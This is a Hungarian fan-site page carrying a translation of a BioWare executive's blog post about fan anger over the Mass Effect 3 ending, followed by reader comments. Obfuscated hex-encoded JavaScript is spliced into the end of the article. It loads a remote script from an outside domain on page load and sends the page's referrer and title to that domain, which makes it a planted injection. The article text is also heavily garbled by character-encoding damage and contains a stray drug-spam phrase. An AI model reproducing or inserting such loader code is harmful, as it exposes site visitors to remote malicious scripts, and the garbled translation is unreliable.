Üdvözlünk az SFportal nem hivatalos Mass Effect rajongói oldalán!

Kövess minket!



Vagy kérj e-mail értesítőt!

Enter your email address:

Delivered by FeedBurner

Mass Effect @ Google+

Mass Effect @ Facebook

A hivatalos magyar Mass Effect Facebook oldal

Csatlakozz!

A mai napon Dr. Ray Muzyka, a Bioware stA?diA? tA?rsalapA�tA?ja, A�s az Electronic ArtsA�alelnA�ke reagA?lt a Mass Effect 3A�befejezA�sA�vel kapcsolatban tA?madt rajongA?i felhA?borodA?sra. Az alA?bbiakban a Bioware blogjA?n kA�zzA�tett bejegyzA�sA�nek a fordA�tA?sA?t olvashatjA?tok.

tadalafil europe. A Bioware tA?rsalapA�tA?jakA�nt A�s a BioWare vezA�rigazgatA?jakA�nt nagyon bA?szke vagyok az ME3 csapatA?ra; szemA�ly szerint hiszek abban, hogy a Mass Effect 3 a legjobb munkA?nk, amit idA?ig csinA?ltunk. A�ppen ezA�rt elkA�pesztA�en fA?jdalmas, hogy a rajongA?ktA?l olyan visszajelzA�seket kapunk, amik szerint a jA?tA�k befejezA�sei nem felelnek meg a vA?rakozA?saiknak. Az elsA�, A�sztA�nA�s reakciA?nk az, hogy megvA�djA?k a munkA?nkat A�s rA?mutassunk a kritikusok magas pontszA?maira – ugyanakkor a rajongA?ink irA?nt A�rzett tiszteletbA�l alA?zattal el kell fogadnunk a kritikA?kat A�s visszajelzA�seket.

SzenvedA�lyesen hiszek abban, hogy a jA?tA�k a mA�vA�szetek egyik formA?ja; mA�diumunknak az ereje pedig a kA�zA�nsA�gA?nkbA�l tA?plA?kozik, amely nagyon mA�lyen A�rintett abban, hogy a tA�rtA�net hogyan bontakozik ki. A�s ennek a kA�zA�nsA�gnek vitathatatlan joga az, hogy konstruktA�v kritikA?kat kA�zA�ljA�n. Ezzel egyA?tt azonban hiszek A�s tA?mogatom is a fejlesztA�csapat mA�vA�szeti dA�ntA�seit. A csapat A�s A�n is kemA�nyen gondolkodunk azon, hogyan reagA?ljunk a ME3-al kapcsolatos hozzA?szA?lA?sokra A?gy, hogy kA�zben megtartjuk a jA?tA�k mA�vA�szi integritA?sA?t is.

A Mass Effect 3 A?gy fejezi be a trilA?giA?t, hogy nagyon nagy befolyA?sa van a jA?tA�kosoknak a tA�rtA�net felett, ezA�rt nagyon nehA�z volt szA?munkra megjA?solni azt, milyen A�rzelmeket vA?lt ki a jA?tA�kosokbA?l, amikor befejezi azt. A Mass Effect vilA?gA?ban tett utazA?s nagyon intenzA�v, szemA�lyes A�rzA�seket vA?lt ki a jA?tA�kosokban; de ezzel egyA?tt is, az a szenvedA�lyes reakciA?, amit a leghA�sA�gesebb jA?tA�kosaink egy rA�szA�bA�l a Mass Effect 3 jelenlegi befejezA�sei kivA?ltottak, alapvetA�en megleptek minket. Ezzel az A?ggyel nagyon mA�lyen tA�rA�dA?nk, A�s idA�ben, fair mA?don fogunk rA? vA?laszolni. MA?r most is nagyon kemA�nyen dolgozunk rajta.

MiA?ta a jA?tA�k megjelent, a csapat minden reakciA?t megvizsgA?l, ami a jA?tA�kkal kapcsolatban megtalA?lhatA? – a szaksajtA?t, a fA?rumokat, Facebookot A�s Twittert, csak hogy pA?rat megemlA�tsek. A Mass Effect csapat, csakA?gy, mint minden mA?s csapat a Bioware cA�mke alatt az EA-nA�l, szenvedA�lyes emberekbA�l A?ll, akik kemA�nyen dolgoznak, hogy izgalmas A�s A�rA�mteli A�lmA�nyt szerezzenek rajongA?inknak. MegtiszteltetA�s velA?k dolgozni, mivel volt bA?torsA?guk A�s erejA?k, hogy az A�pA�tA� jellegA� visszajelzA�sekre vA?laszoljanak.

A kutatA?saikra alapozva Casey HudsonA�executive producer A�s a csapat kemA�nyen dolgozik tA�bb olyan jA?tA�ktartalom-kezdemA�nyen, amik segA�thetnek megvA?laszolni a kA�rdA�seket, mA�g nagyon tisztA?nlA?tA?st biztosA�tva azoknak, akik tovA?bbi lezA?rA?st vA?rnak az utazA?sukhoz. ErrA�l A?prilisban fogtok tA�bbet hallani. Nagyon kemA�nyen dolgozunk azon, hogy fenntarthassuk a megfelelA� egyensA?lyt a tA�rtA�netA?nk mA�vA�szi integritA?sA?n, ugyanakkor megfeleljA?nk a rajongA?i visszajelzA�seknek, amiket kaptunk. KiegA�szA�tve ezzel a mA?r meglA�vA� terveinket az A?j Mass Effect tartalmakra A�s A?j teljes jA?tA�kokra, A?gyhogy nyugodjatok meg, az utazA?s a Mass Effect univerzumA?ban tud A�s fog is folytatA?dni.

A Mass Effect 3 megjelenA�sA�re adott reakciA?k megjA?solhatatlanok voltak. EgyrA�szrA�l, hA�sA�ges rajongA?ink egy rA�sze szenvedA�lyesen hangot ad nemtetszA�sA�nek a jA?tA�k lezA?rA?sA?val kapcsolatban; tA�rA�dA?nk ezzel a visszajelzA�ssel A�s tervezzA?k, hogy egyenesen vA?laszolunk rA?juk. Ugyanakkor A?gy tA�nik, hogy a legtA�bben egyetA�rtenek azzal, hogy a jA?tA�k egA�szA�ben vA�ve kitA�nA�, 75 kritika tA�kA�letes pontszA?mot adott rA?, a kritikA?k A?tlaga 90 kA�rA?li. BA?szke vagyok a csapatra, de tudunk A�s muszA?j is mindig jobban igyekezni.

A bA�rA?latok egy rA�sze, amit a szenvedA�lyessA�g hevA�ben nA�hA?ny nagyon tA?zes rajongA?nk adott, sajnA?latos mA?don inkA?bb destruktA�v mint konstruktA�v volt, mA�g abban az esetben is, ha olyan alapos indokra A�pA?lt is, mint a kA�rdA�sek egy rA�szA�nek tisztA?zA?sa vagy a jobb lezA?rA?s. Meghallgatjuk A�s vA?laszolunk a konstruktA�v kritikA?kat, de nem tolerA?ljuk az egyA�ni tA?madA?sokat a csapatunk tagjai ellen A�s nem tA?mogatunk vagy vA?laszolunk destruktA�v kommentA?rokra.

Ha Mass Effect rajongA? vagy A�s megjegyzA�sed lenne a csapat szA?mA?ra – tiszteljA?k a vA�lemA�nyedet A�s hallani akarunk rA?la. ElkA�teleztA?k magunkat, hogy a legjobban megfelelA?nk a konstruktA�v visszajelzA�sekre. CserA�be azt kA�rem, hogy segA�tsetek nekA?nk azzal, hogy tA?mogatjA?tok azt a jA?tA�kot, ami hitem szerint a Bioware egyik legjobbja. Arra A�sztA�nA�zlek titeket, hogy csinA?ljA?tok meg a sajA?t kutatA?sotokat; jA?tszatok a jA?tA�kkal, fejezzA�tek be, A�s mondjA?tok el nekA?nk, mit gondoltok. MondjA?tok el a barA?taitoknak, ha A?gy A�rzitek, hogy egA�szA�ben vA�ve ez egy jA? jA?tA�k. BA�zzatokA�abban, hogy minden tA�lA?nk telhetA�t megteszA?nk megfeleljA?nk a visszajelzA�seitekre. Mint mA�vA�szek, nagyon mA�lyen tA�rA�dA?nk a rajongA?inkkal A�s kA�szA�njA?k a tA?mogatA?sotokat.

KA�szA�njA?k a visszajelzA�seket – mi meghallgatunk titeket.

Rayvar _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Dr. Ray Muzyka, a Bioware tA?rsalapA�tA?jA?nak reakciA?ja [Bioware blog] bejegyzéshez 12 hozzászólás

  • BigBadWolf szerint:

    Hát, április nincs messze… Ennyit kibír az ember, bár még mindig úgy gondolom hogy:
    “Hold the line!”

  • Ghostleader szerint:

    Már megint ez a fos duma..

  • Merras szerint:

    Ez egy szimpla PR bullshit, és ráadásul rossz érzéseim vannak a végkimenetelt illetően.

    1., lejön, hogy tök jónak érzik a befejezést, és nem értik, mi a rajongók problémája
    2., jönnek a “művészi integritás”-dumával, amikor egész egyszerűen rossz a játék befejezése. Tanulhatnának a Bethesda-tól, akinek a vezetője képes volt elismerni, hogy elcseszték a Fallout 3 végét.
    3., próbálják kisebbíteni az elégedetlenkedők tömegét, és nagyobbítani az elégedettek táborát. Viszont minden felmérés és fórum az ellenkező arányt mutatja
    4. nekem úgy tűnik, hogy az újabb DLC-kből inkább magyarázatot, némi kiegészítést láthatunk majd a meglévő befejezésre, nem pedig egy új befejezést.
    5. nem tudom, mit ért destruktív kritika alatt; hacsak azt nem, hogy már látják az eladások csökkenését, de erről meg nem a rajongók tehetnek.

  • slashice szerint:

    Komolyan – már elnézést, hogy így fogalmazok – nem ér náluk agyat, hogy azzal van a fő problémánk, hogy semmi köze a történethez az utolsó 10-15 percnek?

    A Deception novellánál legalább elismerték, hogy hibáztak, és javítani fogják. Egyelőre az ME3 végét nagyon védik… de mintha erre a Dietz gyerekre bízták volna a befejezés megírását, annyira nincs semmi köze a Mass Effect trilógiához a befejezésnek.

    • Flanders szerint:

      mert rá volt bízva, Drew Karpyshyn át lett irányítva az EA által már a projekt elején sajnos.

      • Merras szerint:

        Hál’ istennek Dietz nem dolgozott az ME3-on, Karpyshyn pedig már az ME2 idején távozott a gárdából. Előbb az SWTOR-on dolgozott, év eleje óta meg szabadúszó.

        • Law szerint:

          Kösz az infót. Annyit tudtam csak, hogy az SWTOR-on dolgozott.
          ME2-t mikor hagyta el? Illetve menyit dolgozott benne?
          Azért kérdezem, mert látom otthonosan mozogsz a témában.

          Különben gondolom nektek is feltűnt, de az ME3-ban a Rannoch küldetések után van egy hatalmas nagy törés. Addig a sztori is kidolgozottnak hat, egyfajta kerek egész, ami a kisebb-nagyobb hibái ellenére illik az eddigi történtekhez. Itt még a haldokló Reaper is körülbelül hasonló dolgokat mond mint Nazara és Harbinger.
          Az ezután való történéseken már kezdtem érezni, hogy valami megváltozott.
          Más is így volt vele?

          • Merras szerint:

            Nem annyira szembetűnő, de igen. Még a Thessia mission okés, bár már ott érződik, hogy valami nem stimt.

            Egyébként azon a pályán érződik a legjobban, hogy Javik mégiscsak egy utólag kivágott karakter, aki amúgy eredetileg is a sztori szerves része volt.

            Egy második végigjátszásban direkt azt csináltam, hogy Javikot vittem Liara mellé, és bizony nagyon sok kommentje van a templomban és sokat vitatkozik Javik Liarával. Plusz, akár Javikot vitted társnak, akár nem, a küldetés után kitör a balhé kettejük között a Normandyn, úgy kell lecsillapítani a kedélyeket. Ez a jelenet is arra utal, hogy a sztori szerves része volt Javik.

            Az eredeti tervek szerint állítólag egyébként – hasonlóan a Virmire-küldetéshez -, itt is elvesztetted volna az egyik kísérőt, értelemszerűen Liara és a másik csapattárs között kellett volna választani. Én örülök, hogy ezt kivágták belőle. A Virmire döntésnek volt alapja és értelme, míg Kai Leng szerintem a legpocsékabb boss a Mass Effect sorozatban, akit azért nem lehet szájbarúgni, mert csak. [Sarent sem lehetett szájbarúgni a Virmire-ön, mégis jól meg volt oldva a dolog; a harcot nagyon jól körítette a vele való beszélgetés.]

          • Dark Energy szerint:

            Én csak akkor kezdtem konkrétan érezni, mikor már Londonban búcsúzkodni kezdtünk a társakkal, hogy már egy ideje nem jó irányba megyünk.

            Az is feltűnő volt, hogy a Cerberus főbázis előtt megkérdez a játék, hogy tutira biztosan indítod a küldit? Akkor már egyértelmű volt, hogy a végjátékba csaptunk és valami fog az Illusive Man-nél történni ami után egyenesen jöhetünk vissza a Földre.

            Habár hiányzott, örültem, hogy kimaradt, ha érzelmileg sokkolnak, hogy áldozz fel csapattagot vagy bizonyos mission-re ha nem jó társakat viszel akkor esetleg meghalnak vagy valami.
            Ha látom elhullani a társakat és/vagy látni az esélytelenséget, akkor még lett is volna értelme a piros/arany/narancssárga robbanást választani vagy akármelyiket mert akkor minden mindegy lett volna…

  • Atilorn szerint:

    Én pedig köszönöm ezt a tartalmas és korrekt közleményt Ray Muzyka-nak. Én is azok táborába tartozok, akiknek nagyon nem tetszett a befejezés és remélem, hogy kezdenek vele valamit. Igazat adok neki. A destruktív fröcsögéseket és köpködéseket nem szabad tolerálni, elvégre egy szuper trilógiát adtak nekünk.A kulturált észérvekkel kommentelőket pedig meg kell hallgatni, és nem szarni a fejükre. Most csak egyetlen negatív kritikát mondok a végével: Mi a szarért kellett Shepivel Istent játszatni?

  • Dark Energy szerint:

    Nekem már az is eszembe jutott kínomban, hogy mi van ha ez az egész el volt tervezve?
    Szánt szándékkal készítették így a befejezést, mi reagáltunk, ők röhögtek a markukba, hogy pont ezt várták, nekünk azt kommunikálták, hogy nem értik, mi bajunk? Kicsit vártak, addig is duzzadt a dolog, mi tartottuk a vonalat, majd jöttek a PR bullshitekkel és nem konkrét mézesmadzaggal hogy lesznek DLC-k, és még nem is vetették el azt az ötletet sem, hogy változtassanak a végén avagy már eleve volt terv erre is (sok kivágott jelenet van még és/ vagy elfekvőben egy izmos DLC bevetésre készen), hogy majd pénzért vagy épp free (EA kapzsi SOB / jófejségi alapon), majd hozzánk lehessen vágni.
    Ha márpedig az egész akció jól eltervezett és ők irányítják a szálakat, akkor bezony indoktrinálva vagyunk úgy istenigazából, frankón.

  • Attila szerint:

    A gond ott van igazándiból hogy Muzyka úrnak vagy fingja sincs az elégedettek/elégedetlenek arányáról (kétlem) vagy egyszerűen egy hazug disznó…. tipikus politikus duma, nagy kalap összehordott semmi az egész.
    Gratulálok Ray, tökéletesen használod a relatív fogalmakat hogy kiforgasd a tényeket: “A rajongók “Egy részének” nem tetszett a játék vége”, hát igen, a 90-98% is “egy része” de inkább 5-6%nak hangzik.

    “A KRITIKUSOK ilyen meg olyan értékelést adtak?” Magasról teszek a kritikusok véleményére, a kritikusok nagyjából 0,001%át teszik ki a játékosoknak nem is beszélve arról hogy nagy részük:
    Vagy: Nem játszott az előző 2 résszel (Ergó nem kötődik a trilógiához lelkileg)
    Vagy: Munkaszerűen foglalkozik játékokkal, kritikákat ír (Ergó nem kötődik a trilógiához lelkileg)
    Vagy: Része bizonyos hiper-cégek által EGYÁLTALÁN nem befolyásolt “Független”(haha) magazinnak legyen az online vagy papírforma (Ergó azt írja amit kell, nem amit akar)

    Szerintem nem a kritikusok alapján kéne megítélni milyen a játék, a kritikusok (általában) adnak egy nagyjáboli véleményt milyen a játék szigorúan technikai szempontból, de ha a vége szar hiába jó a játék technikailag, mert emberek vagyunk és nem úgy működünk hogy “Számítás… a ME3 40 órájából csak 15 percet nem szerettem ezért jó játék.”

    Igen… zseniális játék lenne, valószínűleg a valaha volt legjobb sci-fi dráma trilógia ha a végének köze lenne a játékhoz 😀